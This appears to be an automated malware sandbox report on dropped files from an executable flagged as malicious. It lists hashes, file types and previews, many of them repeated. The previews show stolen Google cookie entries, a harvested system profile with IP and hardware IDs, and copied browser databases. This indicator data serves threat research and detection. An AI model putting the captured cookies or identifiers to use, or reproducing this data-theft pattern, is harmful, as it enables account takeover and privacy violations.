                                                                                                                                                                                  SHA1:61531D43B5ADE8F66FD2409DF1A20902EF1A781E
                                                                                                                                                                                  SHA-256:01024AF50DDAF78F4F6A96B4E537400D4572A47E60CCF542F9EE6771DCDBAC0F
                                                                                                                                                                                  SHA-512:CCF51E10D1AAE0F669B771669F67500E1B7EE712A5078B947D256B57E722244F11F01B018820C4B53D1069137F5F4859E3353D8BE601F4E80AC1ECF939F30368
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*R..n3.@n3.@n3.@5[.A`3.@5[.A.3.@.^.A|3.@.^.Az3.@.^.A.3.@5[.Az3.@5[.A}3.@n3.@.3.@.].Ao3.@.]u@o3.@.].Ao3.@Richn3.@........................PE..L......e.............................@J...........@..........................pJ.....6.....@.................................Vp..j....`........................J...............................J..................................................... . .P..........................@....rsrc........`......................@....idata .....p......................@... ..*.........................@...tfywulqz......0.....................@...prpgnkkw.....0J.....................@....taggant.0...@J.."..................@...................................................................................................................................................................................................................
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (369), with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):530
                                                                                                                                                                                  Entropy (8bit):6.005544722730675
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12:c7F2v4kMx/6UsMbf4/LJPhvkRj6a9kuEYTCRopYxOOVtouEYv:SCJyHXbfQJPh8RdkYiFoYv
                                                                                                                                                                                  MD5:987FB1A1830B0EB5C0D306F8A2DE9981
                                                                                                                                                                                  SHA1:8374E6320AD99C3FF177A9889F1AB75448F6EB19
                                                                                                                                                                                  SHA-256:5EF24A6CE57CA3048431555909EC23CD5494DA76845F84271946442249DDA891
                                                                                                                                                                                  SHA-512:9E2A48264084B79051FC275DD7780A5552B56220459A1CDDBE6F6A307FE0E5759AE20BC243D085D9734153879AC4E66233AB83F92551DD8092EABF85B16F2D15
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.google.com.TRUE./.TRUE.1712298002.NID.ENC893*_djEwx6CLkXLg8AuSZWCgylmAsMNnd1LSfbcL+IfCgMvX/m5IrzdSwxt6X6n5S6C7wCoUoWvuixZpzrMizGZc5ohIpmsvlOrGTOhFkQ4+lCF6fVH0QNPBBb27o2nXM8em7EAYS1bYZC2LV04SqpgyxJmdfFA7UyWUoK8kFZQDRl0vdOzWdvAoumw2skuCCtJC2oG3z3OYbLTLDbM7wYvVmfDeqtnZRihAAt+ptqI6cfY1a+KO9XP+4XkDSXW7JhsexYHBqzSSBmUisGZ7f9E=_DrTFYLsM7YVgEN6pCv/RXeb8Bq748EwHbsLCIGv1kEc=*...google.com.FALSE./.TRUE.1699078840.1P_JAR.ENC893*_djEwZKzV9KAslchfQWnVTck71JHMVRC24lvAWgdl5WpYIXlINsbQSVWzkKU=_DrTFYLsM7YVgEN6pCv/RXeb8Bq748EwHbsLCIGv1kEc=*..
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):5515
                                                                                                                                                                                  Entropy (8bit):5.470891480948761
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:xe+J9GZbRT4cBC1IUlzhgW7ANikYlO4LTRHPTYIehHT4HkXGR035iZtcdaE64nvn:xZXKx484IUlzhtENikYlO4LTRHPTYIe7
                                                                                                                                                                                  MD5:7A06AB13FD459CABA736CC2841BE5C41
                                                                                                                                                                                  SHA1:FBB10CE0A7783FEB40BAD140BF88E5166E2986DF
                                                                                                                                                                                  SHA-256:051DA60FAF5B67CE6A03E3CB2343D8A0F20D6455D549EC6CC8D174D07504930A
                                                                                                                                                                                  SHA-512:60D64B5D44C5BDA36CF2E798886F187F9B081079A33941FA24B351FBAD2454A8EA0A03B32526FEFE89667CC226D9484BF9F2AC624C5896DB504B91AF221218ED
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:Build: macho..Version: 1.5....Date: Wed Feb 21 12:29:14 2024.MachineID: 9e146be9-c76a-4720-bcdb-53011b87bd06..GUID: {a33c7340-61ca-11ee-8c18-806e6f6e6963}..HWID: 546cce35671424c74dd4f154cce32ed2....Path: C:\Users\user\Desktop\I2jCDr35mu.exe..Work Dir: C:\Users\user\AppData\Local\Temp\adobe9NcUyPNf3YG5....IP: 191.96.227.222..Location: US, New York City..Windows: Windows 10 Pro [x64]..Computer Name: 571345..User Name: user..Display Resolution: 1280x1024..Display Language: en-CH..Keyboard Languages: English (United Kingdom) / English (United Kingdom)..Local Time: 21/2/2024 12:29:14..TimeZone: UTC1....[Hardware]..Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..CPU Count: 4..RAM: 8191 MB..VideoCard #0: Microsoft Basic Display Adapter....[Processes]..System [4]..Registry [92]..smss.exe [328]..csrss.exe [412]..wininit.exe [488]..csrss.exe [496]..winlogon.exe [560]..services.exe [632]..lsass.exe [652]..svchost.exe [752]..fontdrvhost.exe [780]..fontdrvhost.exe [788]..svchost.exe
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with CRLF, LF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):4897
                                                                                                                                                                                  Entropy (8bit):2.518316437186352
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:4MMMMMMMMMMdMMMM1MMMMMMMM1MMMMMMMM1MMMMMMMM1MMMMMMMMMMdMMMMMMMM3:q
                                                                                                                                                                                  MD5:B3E9D0E1B8207AA74CB8812BAAF52EAE
                                                                                                                                                                                  SHA1:A2DCE0FB6B0BBC955A1E72EF3D87CADCC6E3CC6B
                                                                                                                                                                                  SHA-256:4993311FC913771ACB526BB5EF73682EDA69CD31AC14D25502E7BDA578FFA37C
                                                                                                                                                                                  SHA-512:B17ADF4AA80CADC581A09C72800DA22F62E5FB32953123F2C513D2E88753C430CC996E82AAE7190C8CB3340FCF2D9E0D759D99D909D2461369275FBE5C68C27A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (369), with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):530
                                                                                                                                                                                  Entropy (8bit):6.005544722730675
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12:c7F2v4kMx/6UsMbf4/LJPhvkRj6a9kuEYTCRopYxOOVtouEYv:SCJyHXbfQJPh8RdkYiFoYv
                                                                                                                                                                                  MD5:987FB1A1830B0EB5C0D306F8A2DE9981
                                                                                                                                                                                  SHA1:8374E6320AD99C3FF177A9889F1AB75448F6EB19
                                                                                                                                                                                  SHA-256:5EF24A6CE57CA3048431555909EC23CD5494DA76845F84271946442249DDA891
                                                                                                                                                                                  SHA-512:9E2A48264084B79051FC275DD7780A5552B56220459A1CDDBE6F6A307FE0E5759AE20BC243D085D9734153879AC4E66233AB83F92551DD8092EABF85B16F2D15
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.google.com.TRUE./.TRUE.1712298002.NID.ENC893*_djEwx6CLkXLg8AuSZWCgylmAsMNnd1LSfbcL+IfCgMvX/m5IrzdSwxt6X6n5S6C7wCoUoWvuixZpzrMizGZc5ohIpmsvlOrGTOhFkQ4+lCF6fVH0QNPBBb27o2nXM8em7EAYS1bYZC2LV04SqpgyxJmdfFA7UyWUoK8kFZQDRl0vdOzWdvAoumw2skuCCtJC2oG3z3OYbLTLDbM7wYvVmfDeqtnZRihAAt+ptqI6cfY1a+KO9XP+4XkDSXW7JhsexYHBqzSSBmUisGZ7f9E=_DrTFYLsM7YVgEN6pCv/RXeb8Bq748EwHbsLCIGv1kEc=*...google.com.FALSE./.TRUE.1699078840.1P_JAR.ENC893*_djEwZKzV9KAslchfQWnVTck71JHMVRC24lvAWgdl5WpYIXlINsbQSVWzkKU=_DrTFYLsM7YVgEN6pCv/RXeb8Bq748EwHbsLCIGv1kEc=*..
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):5564
                                                                                                                                                                                  Entropy (8bit):5.47879047715366
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:xe+CmnbRThcBC1IUlzhgW7ANikYlO4LTRHPTYIehHT4HkXGR035iZtcdaE64nvV2:xZlxh84IUlzhtENikYlO4LTRHPTYIehu
                                                                                                                                                                                  MD5:C708A4BCBB119536A5C65ACDCE7BC6A2
                                                                                                                                                                                  SHA1:29E792E92BD11D869522EFCE797A2C316A3AC533
                                                                                                                                                                                  SHA-256:E474E8B5E67AC38CAE7B7C1FC3AC5F48FA65F7727B7B8894337222FC32EACDBF
                                                                                                                                                                                  SHA-512:44CBFB2E2AC9466C667D0586C67B14AC2AB246CED55680AA42606C2ACBAC7FD7ACD652622C65BE6F22942E70021F347ED8DF3CE8EDA749A2945B2F260ED97ABE
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:Build: macho..Version: 1.5....Date: Wed Feb 21 12:29:19 2024.MachineID: 9e146be9-c76a-4720-bcdb-53011b87bd06..GUID: {a33c7340-61ca-11ee-8c18-806e6f6e6963}..HWID: 546cce35671424c74dd4f154cce32ed2....Path: C:\ProgramData\MPGPH131\MPGPH131.exe..Work Dir: C:\Users\user\AppData\Local\Temp\adobeMl1n683teX9h....IP: 191.96.227.222..Location: US, New York City..Windows: Windows 10 Pro [x64]..Computer Name: 571345..User Name: user..Display Resolution: 1280x1024..Display Language: en-CH..Keyboard Languages: English (United Kingdom) / English (United Kingdom)..Local Time: 21/2/2024 12:29:19..TimeZone: UTC1....[Hardware]..Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..CPU Count: 4..RAM: 8191 MB..VideoCard #0: Microsoft Basic Display Adapter....[Processes]..System [4]..Registry [92]..smss.exe [328]..csrss.exe [412]..wininit.exe [488]..csrss.exe [496]..winlogon.exe [560]..services.exe [632]..lsass.exe [652]..svchost.exe [752]..fontdrvhost.exe [780]..fontdrvhost.exe [788]..svchost.exe [868
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with CRLF, LF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):4897
                                                                                                                                                                                  Entropy (8bit):2.518316437186352
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:4MMMMMMMMMMdMMMM1MMMMMMMM1MMMMMMMM1MMMMMMMM1MMMMMMMMMMdMMMMMMMM3:q
                                                                                                                                                                                  MD5:B3E9D0E1B8207AA74CB8812BAAF52EAE
                                                                                                                                                                                  SHA1:A2DCE0FB6B0BBC955A1E72EF3D87CADCC6E3CC6B
                                                                                                                                                                                  SHA-256:4993311FC913771ACB526BB5EF73682EDA69CD31AC14D25502E7BDA578FFA37C
                                                                                                                                                                                  SHA-512:B17ADF4AA80CADC581A09C72800DA22F62E5FB32953123F2C513D2E88753C430CC996E82AAE7190C8CB3340FCF2D9E0D759D99D909D2461369275FBE5C68C27A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (369), with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):530
                                                                                                                                                                                  Entropy (8bit):6.005544722730675
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12:c7F2v4kMx/6UsMbf4/LJPhvkRj6a9kuEYTCRopYxOOVtouEYv:SCJyHXbfQJPh8RdkYiFoYv
                                                                                                                                                                                  MD5:987FB1A1830B0EB5C0D306F8A2DE9981
                                                                                                                                                                                  SHA1:8374E6320AD99C3FF177A9889F1AB75448F6EB19
                                                                                                                                                                                  SHA-256:5EF24A6CE57CA3048431555909EC23CD5494DA76845F84271946442249DDA891
                                                                                                                                                                                  SHA-512:9E2A48264084B79051FC275DD7780A5552B56220459A1CDDBE6F6A307FE0E5759AE20BC243D085D9734153879AC4E66233AB83F92551DD8092EABF85B16F2D15
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):5531
                                                                                                                                                                                  Entropy (8bit):5.476149468910779
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:xe+4SbRTLLcBC1IUlzhgW7ANikYlO4LTRHPTYIehHT4HkXGR035iZtcdaE64nvVr:xZjxLL84IUlzhtENikYlO4LTRHPTYIeF
                                                                                                                                                                                  MD5:042A6C11E902E02D15A230A213FA7E25
                                                                                                                                                                                  SHA1:51727735AD5FB6D314A109E1D17E0B5DD404A81E
                                                                                                                                                                                  SHA-256:518DA8E816014BAEAEA4D0DA47DFCE983CA9EE5AA0DCAEBC81F0A8438527A17F
                                                                                                                                                                                  SHA-512:FCAF46F0C74B071748CAA44BB8BAEE95B6176E22A28E7E9BB83CD271FA2206AEE34B561D115AA22E3E33F6C065A3D97C9ED57CCBEF58B6CE59344E8B470ECEFD
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:Build: macho..Version: 1.5....Date: Wed Feb 21 12:29:17 2024.MachineID: 9e146be9-c76a-4720-bcdb-53011b87bd06..GUID: {a33c7340-61ca-11ee-8c18-806e6f6e6963}..HWID: 546cce35671424c74dd4f154cce32ed2....Path: C:\ProgramData\MPGPH131\MPGPH131.exe..Work Dir: C:\Users\user\AppData\Local\Temp\adobebBzuPduPgFBl....IP: 191.96.227.222..Location: US, New York City..Windows: Windows 10 Pro [x64]..Computer Name: 571345..User Name: user..Display Resolution: 1280x1024..Display Language: en-CH..Keyboard Languages: English (United Kingdom) / English (United Kingdom)..Local Time: 21/2/2024 12:29:17..TimeZone: UTC1....[Hardware]..Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..CPU Count: 4..RAM: 8191 MB..VideoCard #0: Microsoft Basic Display Adapter....[Processes]..System [4]..Registry [92]..smss.exe [328]..csrss.exe [412]..wininit.exe [488]..csrss.exe [496]..winlogon.exe [560]..services.exe [632]..lsass.exe [652]..svchost.exe [752]..fontdrvhost.exe [780]..fontdrvhost.exe [788]..svchost.exe [868
                                                                                                                                                                                  Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with CRLF, LF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):4897
                                                                                                                                                                                  Entropy (8bit):2.518316437186352
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:4MMMMMMMMMMdMMMM1MMMMMMMM1MMMMMMMM1MMMMMMMM1MMMMMMMMMMdMMMMMMMM3:q
                                                                                                                                                                                  MD5:B3E9D0E1B8207AA74CB8812BAAF52EAE
                                                                                                                                                                                  SHA1:A2DCE0FB6B0BBC955A1E72EF3D87CADCC6E3CC6B
                                                                                                                                                                                  SHA-256:4993311FC913771ACB526BB5EF73682EDA69CD31AC14D25502E7BDA578FFA37C
                                                                                                                                                                                  SHA-512:B17ADF4AA80CADC581A09C72800DA22F62E5FB32953123F2C513D2E88753C430CC996E82AAE7190C8CB3340FCF2D9E0D759D99D909D2461369275FBE5C68C27A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):98996
                                                                                                                                                                                  Entropy (8bit):7.702003651641397
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3072:+cQXinoKQoMGurcwFy3iTpv6zM39m3FPS:+cEUoKnfLvCCzM39m3FPS
                                                                                                                                                                                  MD5:34F93FE5B54D7C652360BA28D94F8E66
                                                                                                                                                                                  SHA1:31901469EADAD58B8BF99BBD9698E60ACDD7ABED
                                                                                                                                                                                  SHA-256:10DC1ED2D8D9D4DB369DDF7FD6F53EFFC9BFD87F46AFDFC6C86CB637D2067A38
                                                                                                                                                                                  SHA-512:9B86ACC2F5B92A75BD3028352F03DA10C6424C3514A3372A32EA8F60E79770D8B5AC5DBE0B45DD54B804C6EC79E1A1DBD887D0DF333DD253238DC30E6C5A1000
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                                  Entropy (8bit):0.5394293526345721
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                  MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                  SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                  SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                  SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):98304
                                                                                                                                                                                  Entropy (8bit):0.08235737944063153
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                  Entropy (8bit):0.6732424250451717
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                                  Entropy (8bit):1.136471148832945
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                                                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                                                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                                                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                                                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):5242880
                                                                                                                                                                                  Entropy (8bit):0.0357803477377646
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
                                                                                                                                                                                  MD5:76D181A334D47872CD2E37135CC83F95
                                                                                                                                                                                  SHA1:B563370B023073CE6E0F63671AA4AF169ABBF4E1
                                                                                                                                                                                  SHA-256:52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
                                                                                                                                                                                  SHA-512:23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                                  Entropy (8bit):1.136471148832945
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                                                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                                                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                                                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                                                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):5242880
                                                                                                                                                                                  Entropy (8bit):0.0357803477377646
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
                                                                                                                                                                                  MD5:76D181A334D47872CD2E37135CC83F95
                                                                                                                                                                                  SHA1:B563370B023073CE6E0F63671AA4AF169ABBF4E1
                                                                                                                                                                                  SHA-256:52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
                                                                                                                                                                                  SHA-512:23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                                  Entropy (8bit):0.5394293526345721
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                  MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                  SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                  SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                  SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):917504
                                                                                                                                                                                  Entropy (8bit):6.5798614215687845
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12288:MqDEvFo+yo4DdbbMWu/jrQu4M9lBAlKhQcDGB3cuBNGE6iOrpfe4JdaDgaKTx:MqDEvCTbMWu7rQYlBQcBiT6rprG8aax
                                                                                                                                                                                  MD5:CBE3CA8AEB654F541B59B3F97C0C9492
                                                                                                                                                                                  SHA1:C775259EB2B550BA7A9C49A12138562D9753D450
                                                                                                                                                                                  SHA-256:11E7D4527918A37E28F345ACF4A6E6AE7665D7D204543232E9400F92C58CB367
                                                                                                                                                                                  SHA-512:C0987C12B294CF37FF40F45EFF08F32A3A7F806B6A3C968832C5A2A44AEAE92AF32F229A8C5D5B60C806C8B6FC9AB1C411EC45C18AFC4D4F4675ED73F4B8E186
                                                                                                                                                                                  Malicious:true
